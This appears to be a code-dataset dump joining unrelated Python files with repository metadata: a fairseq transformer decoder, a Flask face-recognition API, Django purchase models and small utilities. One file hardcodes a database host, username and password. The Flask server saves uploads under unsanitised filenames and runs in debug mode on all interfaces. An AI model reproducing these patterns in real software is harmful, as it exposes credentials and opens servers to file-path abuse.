embed_tokens,
output_projection=None,
encoder_attn_merge_type="sequential",
dropnet_ratio=0.0,
):
super().__init__(
cfg,
dictionary,
embed_tokens,
no_encoder_attn=False,
output_projection=output_projection,
)
# assert cfg.cross_self_attention
self.cross_self_attention = cfg.cross_self_attention
if self.decoder_layerdrop > 0.0:
self.layers = LayerDropModuleList(p=self.decoder_layerdrop)
else:
self.layers = nn.ModuleList([])
self.layers.extend(
[
self.build_decoder_layer(cfg, encoder_attn_merge_type, dropnet_ratio)
for _ in range(cfg.decoder.layers)
]
)
def build_decoder_layer(
self,
cfg,
encoder_attn_merge_type="sequential",
dropnet_ratio=0,
):
layer = transformer_layer_aug.AugTransformerDecoderLayerBase(
cfg,
no_encoder_attn=False,
encoder_attn_merge_type=encoder_attn_merge_type,
dropnet_ratio=dropnet_ratio,
)
checkpoint = cfg.checkpoint_activations
if checkpoint:
offload_to_cpu = cfg.offload_activations
layer = checkpoint_wrapper(layer, offload_to_cpu=offload_to_cpu)
# if we are checkpointing, enforce that FSDP always wraps the
# checkpointed layer, regardless of layer size
min_params_to_wrap = cfg.min_params_to_wrap if not checkpoint else 0
layer = fsdp_wrap(layer, min_num_params=min_params_to_wrap)
return layer
def forward(
self,
prev_output_tokens,
encoder_out: Optional[Dict[str, List[Tensor]]] = None,
encoder_out_aug: Optional[Dict[str, List[Tensor]]] = None,
incremental_state: Optional[Dict[str, Dict[str, Optional[Tensor]]]] = None,
features_only: bool = False,
full_context_alignment: bool = False,
alignment_layer: Optional[int] = None,
alignment_heads: Optional[int] = None,
src_lengths: Optional[Any] = None,
return_all_hiddens: bool = False,
):
"""
Args:
prev_output_tokens (LongTensor): previous decoder outputs of shape
`(batch, tgt_len)`, for teacher forcing
encoder_out (optional): output from the encoder, used for
encoder-side attention, should be of size T x B x C
incremental_state (dict): dictionary used for storing state during
:ref:`Incremental decoding`
features_only (bool, optional): only return features without
applying output layer (default: False).
full_context_alignment (bool, optional): don't apply
auto-regressive mask to self-attention (default: False).
Returns:
tuple:
- the decoder's output of shape `(batch, tgt_len, vocab)`
- a dictionary with any model-specific outputs
"""
x, extra = self.extract_features(
prev_output_tokens,
encoder_out=encoder_out,
encoder_out_aug=encoder_out_aug,
incremental_state=incremental_state,
full_context_alignment=full_context_alignment,
alignment_layer=alignment_layer,
alignment_heads=alignment_heads,
)
if not features_only:
x = self.output_layer(x)
return x, extra
def extract_features(
self,
prev_output_tokens,
encoder_out: Optional[Dict[str, List[Tensor]]],
encoder_out_aug: Optional[Dict[str, List[Tensor]]],
incremental_state: Optional[Dict[str, Dict[str, Optional[Tensor]]]] = None,
full_context_alignment: bool = False,
alignment_layer: Optional[int] = None,
alignment_heads: Optional[int] = None,
):
return self.extract_features_scriptable(
prev_output_tokens,
encoder_out,
encoder_out_aug,
incremental_state,
full_context_alignment,
alignment_layer,
alignment_heads,
)
"""
A scriptable subclass of this class has an extract_features method and calls
super().extract_features, but super() is not supported in torchscript. A copy of
this function is made to be used in the subclass instead.
"""
def extract_features_scriptable(
self,
prev_output_tokens,
encoder_out: Optional[Dict[str, List[Tensor]]],
encoder_out_aug: Optional[Dict[str, List[Tensor]]],
incremental_state: Optional[Dict[str, Dict[str, Optional[Tensor]]]] = None,
full_context_alignment: bool = False,
alignment_layer: Optional[int] = None,
alignment_heads: Optional[int] = None,
):
"""
Similar to *forward* but only return features.
Includes several features from "Jointly Learning to Align and
Translate with Transformer Models" (Garg et al., EMNLP 2019).
Args:
full_context_alignment (bool, optional): don't apply
auto-regressive mask to self-attention (default: False).
alignment_layer (int, optional): return mean alignment over
heads at this layer (default: last layer).
alignment_heads (int, optional): only average alignment over
this many heads (default: all heads).
Returns:
tuple:
- the decoder's features of shape `(batch, tgt_len, embed_dim)`
- a dictionary with any model-specific outputs
"""
bs, slen = prev_output_tokens.size()
if alignment_layer is None:
alignment_layer = self.num_layers - 1
enc: Optional[Tensor] = None
padding_mask: Optional[Tensor] = None
if encoder_out is not None and len(encoder_out["encoder_out"]) > 0:
enc = encoder_out["encoder_out"][0]
if encoder_out is not None and len(encoder_out["encoder_padding_mask"]) > 0:
padding_mask = encoder_out["encoder_padding_mask"][0]
enc_aug: Optional[Tensor] = None
padding_mask_aug: Optional[Tensor] = None
if encoder_out_aug is not None and len(encoder_out_aug["encoder_out"]) > 0:
enc_aug = encoder_out_aug["encoder_out"][0]
if (
encoder_out_aug is not None
and len(encoder_out_aug["encoder_padding_mask"]) > 0
):
padding_mask_aug = encoder_out_aug["encoder_padding_mask"][0]
# embed positions
positions = None
if self.embed_positions is not None:
positions = self.embed_positions(
prev_output_tokens, incremental_state=incremental_state
)
if incremental_state is not None:
prev_output_tokens = prev_output_tokens[:, -1:]
if positions is not None:
positions = positions[:, -1:]
# Prevent torchscript exporting issue for dynamic quant embedding
prev_output_tokens = prev_output_tokens.contiguous()
# embed tokens and positions
x = self.embed_scale * self.embed_tokens(prev_output_tokens)
if self.quant_noise is not None:
x = self.quant_noise(x)
if self.project_in_dim is not None:
x = self.project_in_dim(x)
if positions is not None:
x += positions
if self.layernorm_embedding is not None:
x = self.layernorm_embedding(x)
x = self.dropout_module(x)
# B x T x C -> T x B x C
x = x.transpose(0, 1)
self_attn_padding_mask: Optional[Tensor] = None
if self.cross_self_attention or prev_output_tokens.eq(self.padding_idx).any():
self_attn_padding_mask = prev_output_tokens.eq(self.padding_idx)
# decoder layers
attn: Optional[Tensor] = None
attn_aug: Optional[Tensor] = None
inner_states: List[Optional[Tensor]] = [x]
for idx, layer in enumerate(self.layers):
if incremental_state is None and not full_context_alignment:
self_attn_mask = self.buffered_future_mask(x)
else:
self_attn_mask = None
x, layer_attn, layer_attn_aug, _ = layer(
x,
enc,
padding_mask,
enc_aug,
padding_mask_aug,
incremental_state,
self_attn_mask=self_attn_mask,
self_attn_padding_mask=self_attn_padding_mask,
need_attn=bool((idx == alignment_layer)),
need_head_weights=bool((idx == alignment_layer)),
)
inner_states.append(x)
if layer_attn is not None and idx == alignment_layer:
attn = layer_attn.float().to(x)
if layer_attn_aug is not None and idx == alignment_layer:
attn_aug = layer_attn_aug.float().to(x)
if attn is not None:
if alignment_heads is not None:
attn = attn[:alignment_heads]
# average probabilities over heads
attn = attn.mean(dim=0)
if attn_aug is not None:
if alignment_heads is not None:
attn_aug = attn_aug[:alignment_heads]
# average probabilities over heads
attn_aug = attn_aug.mean(dim=0)
if self.layer_norm is not None:
x = self.layer_norm(x)
# T x B x C -> B x T x C
x = x.transpose(0, 1)
if self.project_out_dim is not None:
x = self.project_out_dim(x)
return x, {"attn": [attn], "attn_aug": [attn_aug], "inner_states": inner_states}
def upgrade_state_dict_named(self, state_dict, name):
"""Upgrade a (possibly old) state dict for new versions of fairseq."""
if isinstance(self.embed_positions, SinusoidalPositionalEmbedding):
weights_key = "{}.embed_positions.weights".format(name)
if weights_key in state_dict:
del state_dict[weights_key]
state_dict[
"{}.embed_positions._float_tensor".format(name)
] = torch.FloatTensor(1)
if f"{name}.output_projection.weight" not in state_dict:
if self.share_input_output_embed:
embed_out_key = f"{name}.embed_tokens.weight"
else:
embed_out_key = f"{name}.embed_out"
if embed_out_key in state_dict:
state_dict[f"{name}.output_projection.weight"] = state_dict[
embed_out_key
]
if not self.share_input_output_embed:
del state_dict[embed_out_key]
for i in range(self.num_layers):
# update layer norms
layer_norm_map = {
"0": "self_attn_layer_norm",
"1": "encoder_attn_layer_norm",
"2": "encoder_attn_layer_norm2",
"3": "final_layer_norm",
}
for old, new in layer_norm_map.items():
for m in ("weight", "bias"):
k = "{}.layers.{}.layer_norms.{}.{}".format(name, i, old, m)
if k in state_dict:
state_dict[
"{}.layers.{}.{}.{}".format(name, i, new, m)
] = state_dict[k]
del state_dict[k]
version_key = "{}.version".format(name)
if utils.item(state_dict.get(version_key, torch.Tensor([1]))[0]) <= 2:
# earlier checkpoints did not normalize after the stack of layers
self.layer_norm = None
self.normalize = False
state_dict[version_key] = torch.Tensor([1])
return state_dict
class AugTransformerDecoder(AugTransformerDecoderBase):
def __init__(
self,
args,
dictionary,
embed_tokens,
output_projection=None,
):
self.args = args
super().__init__(
TransformerConfig.from_namespace(args),
dictionary,
embed_tokens,
no_encoder_attn=False,
output_projection=output_projection,
encoder_attn_merge_type=getattr(
args, "synthesizer_augmented_cross_attention_merge_type", "sequential"
),
dropnet_ratio=getattr(args, "dropnet_ratio", 0),
)
def build_output_projection(self, args, dictionary, embed_tokens):
super().build_output_projection(
TransformerConfig.from_namespace(args), dictionary, embed_tokens
)
def build_decoder_layer(
self,
args,
encoder_attn_merge_type="sequential",
dropnet_ratio=0,
):
return super().build_decoder_layer(
TransformerConfig.from_namespace(args),
no_encoder_attn=False,
encoder_attn_merge_type=encoder_attn_merge_type,
dropnet_ratio=dropnet_ratio,
)
|
[
"chensida@huawei.com"
] |
chensida@huawei.com
|
8770327fd46000407e804baae2a0d53f472ed0ca
|
2a1bffbab39918e0ee9e7dfa08b7d9120ed25f21
|
/server.py
|
cca85f7111e3ad8bc23be7df027f11383ea642f6
|
[] |
no_license
|
sumitu27/Face_detection
|
bccdd283e4b2732b70ce6fd08a291c3027db754b
|
9d0c05c3c23618779abe56a5281bc6b8f310798c
|
refs/heads/master
| 2021-06-28T14:27:34.000430
| 2020-09-24T18:40:34
| 2020-09-24T18:40:34
| 152,997,679
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,769
|
py
|
from flask import Flask, render_template, request
from flask import jsonify
from flask_cors import CORS
import os
from add_face_in_collection import add_faces_to_collection
from s3_bucket import store_image_into_s3_bucket
from show_list_of_faces import list_faces_in_collection
from detect_faces_from_image import detect_faces_in_image
from collection_for_face import create_collection, delete_collection
app = Flask(__name__)
CORS(app)
@app.route('/')
def upload_file():
return render_template('index.html')
@app.route('/dev/add_face', methods=['GET', 'POST'])
def add_face_in_collection():
f = request.files["file"]
upload_file_name = "./added_face/" + f.filename
f.save("./added_face/" + f.filename)
file_name, ext = os.path.splitext(os.path.basename(upload_file_name))
store_image_into_s3_bucket(upload_file_name, file_name, os.path.basename(upload_file_name))
add_faces_to_collection('my-personal-data-sumit', os.path.basename(upload_file_name), "family_collection")
return "Face Added Successfully :::: " + str(file_name)
@app.route('/dev/list_of_faces', methods=['GET', 'POST'])
def list_of_faces():
collection_id = 'family_collection'
faces_count = list_faces_in_collection(collection_id)
if isinstance(faces_count,str):
return faces_count
else:
return jsonify(faces_count)
@app.route('/dev/detect_faces', methods=['GET', 'POST'])
def detect_faces():
f = request.files["file"]
upload_file_name = "./detect_faces/" + f.filename
f.save("./detect_faces/" + f.filename)
file_name, ext = os.path.splitext(os.path.basename(upload_file_name))
store_image_into_s3_bucket(upload_file_name, file_name, os.path.basename(upload_file_name))
return_response = detect_faces_in_image(os.path.basename(upload_file_name), 'my-personal-data-sumit', upload_file_name)
return_dict ={}
return_dict["Person Identified"] = return_response
return jsonify(return_dict)
@app.route('/dev/create_face_collection', methods=['GET', 'POST'])
def create_face_collection():
collection_id = 'family_collection'
status_code = create_collection(collection_id)
print('Status code: ' + str(status_code))
if str(status_code).strip() == "200":
return "Face Collection Created Successfully"
return str(status_code)
@app.route('/dev/delete_face_collection', methods=['GET', 'POST'])
def delete_face_collection():
collection_id = 'family_collection'
status_code = delete_collection(collection_id)
print('Status code: ' + str(status_code))
if str(status_code).strip() == "200":
return "Face Collection Deleted Successfully"
return str(status_code)
if __name__ == '__main__':
app.run(debug=True, port="5005", host="0.0.0.0")
|
[
"sumitu27@gmail.com"
] |
sumitu27@gmail.com
|
48ba43c4ade9ef9ed87f8471fa199dac6bc3a6a9
|
9436682c3d21fbe2737724ce24f2d7c79b5f7598
|
/transformerLM_org/locked_dropout.py
|
36ae543e5a82d44252662117c793fe796904083e
|
[
"BSD-3-Clause"
] |
permissive
|
grandeelee/codeswitch-challenge-LM
|
5f2cea2db29b02e54d4b36f69b85a0e3b4689442
|
d44f922d25df34a5905917b0351a7bbf3cccf22f
|
refs/heads/master
| 2022-08-12T05:43:45.836690
| 2019-12-20T01:39:41
| 2019-12-20T01:39:41
| 210,730,930
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 879
|
py
|
import torch.nn as nn
import torch
class LockedDropout(nn.Module):
def __init__(self, dropout=None):
super(LockedDropout, self).__init__()
self.dropout = dropout
def forward(self, x):
if not self.training or not self.dropout:
return x
# same mask for each word a seq
mask = x.data.new_empty(x.size(0), 1, x.size(2)).bernoulli_(1 - self.dropout) / (1 - self.dropout)
mask = mask.expand_as(x)
return mask * x
class MaskDropout(nn.Module):
def __init__(self, dropout=None):
super(MaskDropout, self).__init__()
self.dropout = dropout
def forward(self, x):
if not self.training or not self.dropout:
return x
# mask out same tokens in the sequence
# mask is of size [batch, head, seq, seq]
mask = x.data.new_empty(x.size(0), 1, 1, x.size(3)).bernoulli_(1 - self.dropout) / (1 - self.dropout / 2)
mask = mask.expand_as(x)
return mask * x
|
[
"grandee.lee@gmail.com"
] |
grandee.lee@gmail.com
|
ef89edf72b6fef1c644f641a5e5131067c3652a6
|
62f08c50bb3ed5e025565bd9813602a7d5d486b0
|
/mod/databases/db.py
|
06b7645dfe593ae2854cd63a7ff17ca3e3ad4b85
|
[] |
no_license
|
flyingzhao/youin-tornado
|
c7b97ade9fc1f17e7302e09948e5b589cb80770d
|
e09ecea1ddd7cdd75ed03f5ad0d6923a70a31fb8
|
refs/heads/master
| 2021-01-14T10:39:45.163617
| 2015-10-08T14:51:40
| 2015-10-08T14:51:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 541
|
py
|
# -*- coding: utf-8 -*-
DB_HOST = '115.28.27.150'
# DB_HOST = '127.0.0.1'
DB_USER = 'youyinuser'
# DB_USER = 'root'
DB_PWD = 'youyin2015'
# DB_PWD = '084358'
DB_NAME = 'youyin'
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base() #create Base lei
engine = create_engine('mysql://%s:%s@%s/%s?charset=utf8' %
(DB_USER, DB_PWD, DB_HOST, DB_NAME),
encoding='utf-8', echo=False,
pool_size=100, pool_recycle=10)
|
[
"1948448114@qq.com"
] |
1948448114@qq.com
|
d404e395bc7af7f6fff3d1e90df9cae2080d961d
|
84c1e780a349c4bae2d6cf4c1da72889d5222797
|
/Python/Sets/Add Element/add_element.py
|
734881c62f2cf52476f8c83a4d58493999e2141a
|
[
"MIT"
] |
permissive
|
brianchiang-tw/HackerRank
|
18e31583b10cf2189adac97e7cb2997d46790bcd
|
02a30a0033b881206fa15b8d6b4ef99b2dc420c8
|
refs/heads/master
| 2020-09-23T23:18:08.253868
| 2020-02-13T14:16:22
| 2020-02-13T14:16:22
| 225,612,833
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 493
|
py
|
# Enter your code here. Read input from STDIN. Print output to STDOUT
from typing import Set
def add_element_to_set( set_a: Set, new_element:str)->None:
set_a.add( new_element )
return
def num_of_unique_element( set_a: Set)->int:
return len(set_a)
if __name__ == '__main__':
N = int( input() )
set_a = set()
for _ in range(N):
input_str = input()
add_element_to_set(set_a, input_str)
print( num_of_unique_element( set_a ) )
|
[
"brianchiang1988@icloud.com"
] |
brianchiang1988@icloud.com
|
587fc2d1ad57042f6ea786215c71dfcfc01612ab
|
cd8f7ecd20c58ce1ae0fe3840f7c7ee961aa5819
|
/SubdomainVisitCount.py
|
64404a58e7a5e1cf86da8c6f08587ad1aafb6ab4
|
[
"Apache-2.0"
] |
permissive
|
sugia/leetcode
|
9b0f2a3521b088f8f7e5633c2c6c17c76d33dcaf
|
6facec2a54d1d9f133f420c9bce1d1043f57ebc6
|
refs/heads/master
| 2021-06-05T07:20:04.099488
| 2021-02-24T07:24:50
| 2021-02-24T07:24:50
| 29,124,136
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,578
|
py
|
'''
A website domain like "discuss.leetcode.com" consists of various subdomains. At the top level, we have "com", at the next level, we have "leetcode.com", and at the lowest level, "discuss.leetcode.com". When we visit a domain like "discuss.leetcode.com", we will also visit the parent domains "leetcode.com" and "com" implicitly.
Now, call a "count-paired domain" to be a count (representing the number of visits this domain received), followed by a space, followed by the address. An example of a count-paired domain might be "9001 discuss.leetcode.com".
We are given a list cpdomains of count-paired domains. We would like a list of count-paired domains, (in the same format as the input, and in any order), that explicitly counts the number of visits to each subdomain.
Example 1:
Input:
["9001 discuss.leetcode.com"]
Output:
["9001 discuss.leetcode.com", "9001 leetcode.com", "9001 com"]
Explanation:
We only have one website domain: "discuss.leetcode.com". As discussed above, the subdomain "leetcode.com" and "com" will also be visited. So they will all be visited 9001 times.
Example 2:
Input:
["900 google.mail.com", "50 yahoo.com", "1 intel.mail.com", "5 wiki.org"]
Output:
["901 mail.com","50 yahoo.com","900 google.mail.com","5 wiki.org","5 org","1 intel.mail.com","951 com"]
Explanation:
We will visit "google.mail.com" 900 times, "yahoo.com" 50 times, "intel.mail.com" once and "wiki.org" 5 times. For the subdomains, we will visit "mail.com" 900 + 1 = 901 times, "com" 900 + 50 + 1 = 951 times, and "org" 5 times.
Notes:
The length of cpdomains will not exceed 100.
The length of each domain name will not exceed 100.
Each address will have either 1 or 2 "." characters.
The input count in any count-paired domain will not exceed 10000.
The answer output can be returned in any order.
'''
class Solution(object):
def subdomainVisits(self, cpdomains):
"""
:type cpdomains: List[str]
:rtype: List[str]
"""
domain_to_count = {}
for line in cpdomains:
vec = line.split(' ')
count = int(vec[0])
components = vec[1].split('.')
for i in xrange(len(components)):
domain = '.'.join(components[i:])
if domain in domain_to_count:
domain_to_count[domain] += count
else:
domain_to_count[domain] = count
res = []
for key in domain_to_count:
res.append(str(domain_to_count[key]) + ' ' + key)
return res
|
[
"noreply@github.com"
] |
sugia.noreply@github.com
|
dc8c18eee4aeb04dc3b4635e978d09cc22174af1
|
7c169c2e3b06bb821418589cb72006986cb15a33
|
/src/scs_osio/topic.py
|
2423a30c4ab8d17d048108049677d8a855845216
|
[
"MIT"
] |
permissive
|
seoss/scs_osio
|
35c6548c15e420e17b189c9d9d61fbcb06f94d0e
|
c6f4bca93e556db5c403f2ff05ae06a9add42a5d
|
refs/heads/master
| 2020-04-04T20:15:23.226017
| 2018-07-10T08:00:14
| 2018-07-10T08:00:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,956
|
py
|
#!/usr/bin/env python3
"""
Created on 16 Feb 2017
@author: Bruno Beloff (bruno.beloff@southcoastscience.com)
Requires APIAuth document.
workflow:
Use osio_publication instead.
command line example:
./topic.py /orgs/south-coast-science-dev/test/1/status -n "test" -d "test of status" -s 28 -v
"""
import sys
from scs_core.data.json import JSONify
from scs_core.osio.client.api_auth import APIAuth
from scs_core.osio.data.topic import Topic
from scs_core.osio.data.topic_info import TopicInfo
from scs_core.osio.manager.topic_manager import TopicManager
from scs_host.client.http_client import HTTPClient
from scs_host.sys.host import Host
from scs_osio.cmd.cmd_topic import CmdTopic
# --------------------------------------------------------------------------------------------------------------------
if __name__ == '__main__':
# ----------------------------------------------------------------------------------------------------------------
# cmd...
cmd = CmdTopic()
if not cmd.is_valid():
cmd.print_help(sys.stderr)
exit(2)
if cmd.verbose:
print("topic: %s" % cmd, file=sys.stderr)
sys.stderr.flush()
# ----------------------------------------------------------------------------------------------------------------
# resources...
# APIAuth...
api_auth = APIAuth.load(Host)
if api_auth is None:
print("topic: APIAuth not available.", file=sys.stderr)
exit(1)
# manager...
manager = TopicManager(HTTPClient(), api_auth.api_key)
# check for existing registration...
topic = manager.find(cmd.path)
# ----------------------------------------------------------------------------------------------------------------
# run...
if cmd.set():
if topic:
if cmd.schema_id is not None:
print("topic: It is not possible to change the schema ID of an existing topic.", file=sys.stderr)
cmd.print_help(sys.stderr)
exit(1)
name = topic.name if cmd.name is None else cmd.name
description = topic.description if cmd.description is None else cmd.description
info = TopicInfo(TopicInfo.FORMAT_JSON) if topic.info is None else topic.info
# update Topic...
updated = Topic(None, name, description, topic.is_public, info, None, None)
manager.update(topic.path, updated)
topic = manager.find(topic.path)
else:
if not cmd.is_complete():
print("topic: All fields required for topic creation must be provided.", file=sys.stderr)
cmd.print_help(sys.stderr)
exit(1)
info = TopicInfo(TopicInfo.FORMAT_JSON)
# create Topic...
topic = Topic(cmd.path, cmd.name, cmd.description, True, info, True, cmd.schema_id)
manager.create(topic)
print(JSONify.dumps(topic))
|
[
"bruno.beloff@southcoastscience.com"
] |
bruno.beloff@southcoastscience.com
|
8e868f3bca628272d0460d3f315e9aef35c58a5e
|
3b316099f27fc3607a7da5189bb7e5d1f6d265a3
|
/popclick/interest_learning.py
|
71b5a84b0b95d6390b9e0a56ec0b6765252e8a4c
|
[] |
no_license
|
phileasme/Mixed-Collaborative-Filtering_PopClick_server
|
91d14fea6601f114e04a52b461f050cd09fc4675
|
0721c78cf1f41cf2a84b2523e4e6d585ecf8ef62
|
refs/heads/master
| 2021-03-19T18:58:58.805233
| 2017-04-18T09:41:19
| 2017-04-18T09:41:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,243
|
py
|
"""
* ©Copyrights, all rights reserved at the exception of the mentioned 3rd party libraries.
* @author: Phileas Hocquard
* Profile Learning, Interests formatting
* Location : /mainsite/popclick/interest_learning.py
"""
# Database models
from .models import Interest, PageobjectInterest, Visit, Website, SecureAuth, Page, Profile, ProfileInterest, PageObject, ProfilePageobject, PageobjectLog
# Operations / Third party
import numpy as np
from numpy import exp, array, random, dot
# External file import
from popclick.neural_network_interests import *
def get_formatted_user_or_pageobject_interests(profile_or_pageobject, query_profiles_interests=None):
"""
Formats an array of intereests for the specified object
Args:
(Profile/Pageobject) profile_or_pageobject
(QueryObject) query_profiles_interests
"""
# Get all names
interests = [i.name for i in Interest.objects.all().order_by('name')]
# Make an array of zeros
standardized_profile_or_pageobject_interests = [0]*(len(interests))
# If there is no QueryObject and there the passed argument is a Profile then fetch object intjersts
if query_profiles_interests == None:
if profile_or_pageobject.__class__.__name__ == 'Profile':
query_profiles_interests = ProfileInterest.objects
# Formulated An array composed of tuples2
if query_profiles_interests != None:
pr_int_lvl_index = [(pi['interest'],pi['level']) for pi in query_profiles_interests.filter(profile=profile_or_pageobject).values('interest','level')]
else:
pr_int_lvl_index = [(pi['interest'],pi['level']) for pi in PageobjectInterest.objects.filter(pageobject=profile_or_pageobject).values('interest','level')]
# For the specific index given by the order of the alphabetically sorted names of interests
for it in pr_int_lvl_index:
standardized_profile_or_pageobject_interests[interests.index(it[0])] = it[1]
return standardized_profile_or_pageobject_interests
def learn_interests(profile, pageobject):
"""
Main learning method for a given profile and knowing that the last object was interacted by more than one user
args:
(Profile): profile
(PageObject): pageobject
"""
matrix_pageobjects_interests = []
# Filter pro_po
profile_pageobjects = ProfilePageobject.objects.filter(profile=profile)
interests = [i.name for i in Interest.objects.all().order_by('name')]
profile_formatted = get_formatted_user_or_pageobject_interests(profile)
if not pageobject.selections == 1:
for profile_pageobject in profile_pageobjects:
# The profile object formulated interests for each pageobjects of the user
formatted_po_interests = get_formatted_user_or_pageobject_interests(profile_pageobject.pageobject)
# There is at least one value that is not a zero interest
if not np.count_nonzero(formatted_po_interests) == 0:
# Append to the matrix
matrix_pageobjects_interests.append([i * profile_pageobject.selections for i in formatted_po_interests])
# Set profile interests, calling the Neural net algorithm
set_profile_interests(profile, runNN(matrix_pageobjects_interests, profile_formatted), interests)
def set_profile_interests(profile, new_profile_interests, interests):
"""
Sets the interests of the user
Args:
(Profile): profile
(ProfileInterest): new_profile_interests
(List): interests
"""
# Learning rate
default_learning_curve= 0.96
# For each interests at their respectful place
for index, interest_name in enumerate(interests):
interest = Interest.objects.get(name=interest_name)
# Create or get the specific interests
profile_interest, created = ProfileInterest.objects.get_or_create(profile=profile, interest=interest)
# Apply the rightful learning rate
if created:
profile_interest.level = (1-default_learning_curve)*new_profile_interests[index]
else:
profile_interest.level = default_learning_curve*profile_interest.level + (1-default_learning_curve)*new_profile_interests[index]
profile_interest.save()
|
[
"phileas.hocquard@gmail.com"
] |
phileas.hocquard@gmail.com
|
da3150e3ef764f498ec892ffff76105a2e017563
|
b0a2d11b3133aa1370c2b5f94437c96942772533
|
/purchaseapp/models.py
|
efd15a730af09855f267b6b9dc2ef37b4f9d3b4a
|
[] |
no_license
|
NeethuDavis1990/Purcahse-Bill-Django
|
f65b0d6e688a2b3adf677b2fbb49ade8ebbc6f02
|
67322e69ce484a487bdef9e84dcb5217b6229b71
|
refs/heads/master
| 2023-08-06T16:28:04.575626
| 2021-10-13T12:33:25
| 2021-10-13T12:33:25
| 416,735,523
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,043
|
py
|
from django.db import models
from django.db.models import deletion
from django.db.models.base import Model
from django.db.models.fields import DecimalField, NullBooleanField
from django.db.models.fields.related import OneToOneField
from django.db.models.lookups import Transform
# Create your models here.
class State(models.Model):
StateId=models.IntegerField(auto_created=True,primary_key=True)
StateName=models.CharField(max_length=50,verbose_name="State",null=True,blank=True)
StateCode=models.IntegerField(verbose_name="State Code",null=True,blank=True,)
StateAbbr=models.CharField(max_length=5,verbose_name="State Abbr",null=True,blank=True)
def __str__(self):
return self.StateName
class City(models.Model):
CityId=models.IntegerField(auto_created=True,primary_key=True)
CityName=models.CharField(max_length=50,verbose_name="City",null=True,blank=True)
State=models.ForeignKey(State,on_delete=models.CASCADE,null=True,blank=True)
def __str__(self):
return self.CityName
class Party(models.Model):
PartyId=models.IntegerField(auto_created=True,primary_key=True)
PartyName=models.CharField(max_length=100,verbose_name="Supplier")
GSTNNo=models.CharField(max_length=17,verbose_name="GSTN No",null=True,blank=True)
State=models.ForeignKey(State,on_delete=models.CASCADE,null=True,blank=True)
City=models.ForeignKey(City,on_delete=models.PROTECT,null=True,blank=True)
Shop=models.CharField(max_length=100,verbose_name="Shop Address",null=True,blank=True)
PartyType=models.CharField(max_length=10,verbose_name="Supplier Type",null=True,blank=True)
IsActive=models.IntegerField(verbose_name="Is Active",default=1)
def __str__(self):
return self.PartyName
class Category(models.Model):
Id=models.IntegerField(auto_created=True,primary_key=True)
CategoryName=models.CharField(max_length=50,verbose_name="Category",null=True,blank=True)
HSNCode=models.CharField(max_length=10,verbose_name="HSN Code",null=True,blank=True)
TaxPercentage=models.DecimalField(verbose_name="Tax Percentage",max_digits=10,decimal_places=3,null=True,blank=True)
def __str__(self):
return self.CategoryName
class UOM(models.Model):
Id=models.IntegerField(auto_created=True,primary_key=True)
Uomtype=models.CharField(max_length=25,verbose_name="UOM")
UomCode=models.CharField(max_length=10,verbose_name="UOM Code",null=True,blank=True)
def __str__(self):
return self.Uomtype
class Product(models.Model):
ProductId=models.IntegerField(auto_created=True,primary_key=True)
ProductName=models.CharField(max_length=100,verbose_name="Item",null=True,blank=True)
ProductCode=models.CharField(max_length=15,verbose_name="Item Code",null=True,blank=True)
ProductPrice=models.DecimalField(max_digits=10,decimal_places=3,null=True,blank=True)
BaseUOM=models.ForeignKey(UOM,on_delete=models.CASCADE,null=True,blank=True,verbose_name="Base UOM")
ReorderLevel=models.IntegerField(verbose_name="Reorder Level",null=True,blank=True)
Category=models.ForeignKey(Category,on_delete=models.CASCADE,null=True,blank=True)
def __str__(self):
return self.ProductName
class Paymentmode(models.Model):
Id=models.IntegerField(auto_created=True,primary_key=True)
PaymentMode=models.CharField(max_length=25,verbose_name="Payment mode",null=True,blank=True)
def __str__(self):
return self.PaymentMode
class PaymentDetails(models.Model):
Id=models.IntegerField(auto_created=True,primary_key=True)
PaymentMode=models.ForeignKey(Paymentmode,on_delete=models.CASCADE,verbose_name="Pay Mode",null=True,blank=True)
PayeeName=models.CharField(max_length=50,verbose_name="Name of Payee",null=True,blank=True)
CardNo=models.CharField(max_length=25,verbose_name="Card Number",null=True,blank=True)
ExpDate=models.DateField(verbose_name="Expiry Date",null=True,blank=True)
Code=models.CharField(max_length=3,verbose_name="Secuirity code",null=True,blank=True)
def __str__(self):
return self.PaymentMode
class PurchaseMaster(models.Model):
Id=models.IntegerField(auto_created=True,primary_key=True)
InvoiceNo=models.CharField(max_length=25,verbose_name="Invoice No")
State=models.ForeignKey(State,on_delete=models.CASCADE,verbose_name="Purchase State",null=True,blank=True)
Supplier=models.ForeignKey(Party,on_delete=models.CASCADE,null=True,blank=True)
Remarks=models.CharField(max_length=550,null=True,blank=True)
InvoiceDate=models.DateField(verbose_name="Invoice Date",null=True,blank=True)
Type=models.CharField(max_length=25,verbose_name="Purchase Type",null=True,blank=True)
Item=models.ManyToManyField(Product,through="PurchaseDetails",related_name="PurchaseMaster")
TaxableAmt=models.DecimalField(max_digits=10,decimal_places=3,verbose_name="Taxable Amount",null=True,blank=True)
CGSTAmnt=models.DecimalField(max_digits=10,decimal_places=3,verbose_name="CGST Amount",null=True,blank=True)
SGSTAmnt=models.DecimalField(max_digits=10,decimal_places=3,verbose_name="SGST Amount",null=True,blank=True)
IGSTAmnt=models.DecimalField(max_digits=10,decimal_places=3,verbose_name="IGST Amount",null=True,blank=True)
Subtotal=models.DecimalField(max_digits=10,decimal_places=3,verbose_name="Purchase Subtotal",null=True,blank=True)
Discount=models.DecimalField(max_digits=10,decimal_places=3,verbose_name="Purchase Discount",null=True,blank=True)
GrantTotal=models.DecimalField(max_digits=10,decimal_places=3,verbose_name="Purchase GrantTotal",null=True,blank=True)
Paymode=models.ForeignKey(Paymentmode,on_delete=models.CASCADE,null=True,blank=True)
def __str__(self):
return self.InvoiceNo
class PurchaseDetails(models.Model):
Id=models.IntegerField(auto_created=True,primary_key=True)
InvoiceNo=models.ForeignKey(PurchaseMaster,on_delete=models.CASCADE,null=True,blank=True)
Item=models.ForeignKey(Product,on_delete=models.CASCADE,null=True,blank=True)
